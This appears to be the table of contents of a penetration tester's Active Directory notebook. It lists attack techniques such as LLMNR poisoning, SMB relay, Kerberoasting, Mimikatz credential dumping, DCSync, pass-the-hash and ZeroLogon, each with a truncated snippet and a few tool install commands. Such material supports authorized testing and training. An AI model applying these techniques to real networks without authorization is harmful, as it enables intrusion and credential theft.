Active Directory
Also, consider taking a look at my Active Directory Attack Map.
While it doesn't cover every possible attack avenue, and isn't as sophisticated as some other mindmaps, I think it does a pretty good job of visualizing some of the information found in this book.
Initial Attack Vectors
Internal: --------- Attack vectors that are ideal for internal penetration tests, where the att...
Enumerating Hosts and Identifying the Domain Controllers
Enumerating Live Hosts Internal ARP-Scan Since this is an internal assessment, Kali is on the ...
LLMNR Poisoning (Internal)
Note: Network Environment Given that LLMNR is a name resolution protocol that works on the Local...
SMB Relay (Internal/External)
Note: Network Environment This attack works best in a flat network. However, as long as the atta...
IPv6 DNS Spoofing (Internal)
Note: Network Environment This spoofing attack and works by sending a router announcement to mul...
NULL Session Enumeration (Internal/External)
NULL Session LDAP, SMB, and RPC may allow a user to authenticate to the service without providin...
Using Faketime for Ad-Hoc Kerberos Authentication
Installing Faketime sudo apt install faketime faketime -h This will run the specified 'progr...
Kerberos Pre-Auth Username Enumeration
How it Works We can send a request for a TGT --- without a pre-authentication hash --- to the Ke...
AS-REP Roasting (Internal/External)
AS-REP Roasting If Kerberos pre-authentication is disabled on a user account in Active Directory...
Passback Attacks (Internal/External)
What's the Flaw? Usually involves an unsecure device -- like a printer or multifunction device -...
PrintNightmare (Internal/External)
Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scannin...
NTLM Credential Stuffing (Internal/External)
NTLM Basic Authentication Could obtain a list of usernames via OSINT, or via something like RI...
Post Exploitation: Enumeration
PowerShell AD Module on Any Domain Host as Any User
Borrow a DLL Normally, one must install RSAT (Remote Server Administration Tools) on a host to m...
Dumping DNS Records with adidnsdump
Active Directory Integrated DNS Dump (adidnsdump) GitHub Repository Installation python3 -m pi...
CrackMapExec
When to Use Useful post-compromise if you've dumped hashes from SAM or LSASS or obtained clearte...
PowerView
Overview A set of PowerShell functions that can be used to enumerate ActiveDirectory. Part of th...
BloodHound
1. Installation sudo apt install -y neo4j bloodhound 2. Setup sudo neo4j console & Navi...
Remote Bloodhound
GitHub Repo Prerequisites impacket ldap3 dnspython Installation python3 -m pip insta...
LdapDomainDump
When to Use You'll know when you've found a domain controller, because it will have ...
LdapSearch
When to Use You'll know when you've found a domain controller, because it will have several por...
Enum4Linux
Details Enum4linux is a tool for enumerating information from Windows and Samba systems. It at...
GetADUsers.py
When to Use Helpful in post-compromise enumeration. If you've compromised a domain-joined host, ...
GetUserSPNs.py
When to Use Useful in post-compromise enumeration. If you acquire user passwords or hashes for a...
Manual Enumeration
net.exe Drawbacks net does not show nested groups net only shows up to 10 groups even if a u...
Extracting Kerberos AS-REQ Pre-Auth Hashes from PCAPs
PCAP Analysis Note the existence of KRB5 protocol traffic on tcp/88, which is further identifi...
Post Exploitation: Attacks
Mimikatz
Overview https://github.com/gentilkiwi/mimikatz There are various spin-offs of the Mimikatz pro...
Dumping Passwords from Windows Credential Manager
Credential Enumeration cmdkey /list In reverse shells, I have noticed that it's impossible to s...
Dumping Hashes without Mimikatz
Post-Compromise on Target Lsass Process Dump Sysinternals ProcDump Download ProcDump here # D...
Impacket-Addcomputer
When to Use Could be used post-compromise upon enumerating the ms-DS-MachineAccountQuota policy....
DCSync
DCSync Overview DC Sync is a legitimate function of Active Directory environments where a domain...
Pass the Password
Overview Cracked a hash or discovered a password for a domain user. Use the password and crackma...
Pass the Hash
Overview Dumped the SAM or LSA and now have hashes for domain or a local users. Use the hash and...
Pass the Ticket
Anatomy of a Kerberos Ticket [0;97d82]-2-0-40e10000-t2_felicia.dean@krbtgt-ZA.TRYHACKME.COM.kirb...
Pass the Key
Kerberos Encryption Keys Policies on the domain controller will dictate which encryption algorit...
Password & Credential Brute Force
User Emumeration You have enumerated users with one of the methods defined here: CrackMapExec...
Token Impersonation
Overview Tokens are temporary keys that allow a user to perform actions on a system or network w...
Spawn Processes as Other Users
RunasCs.exe Project GitHub https://github.com/antonioCoco/RunasCs/releases Example Usage Spaw...
Kerberoasting
Overview The attacker uses a known username and password of a user on a domain. A typical Kerbe...
Group Policy Preferences (GPP)
Overview GPP allows admins to create policies with embedded credentials. The credentials are enc...
PrintNightmare
Local Privilege Escalation https://github.com/calebstewart/CVE-2021-1675
ZeroLogon
Caution This can potentially break a domain controller, due the fact that this attack temporaril...
xfreerdp
Usage and Help Display the xfreerdp man page man xfreerdp Display the xfreerdp help output on ...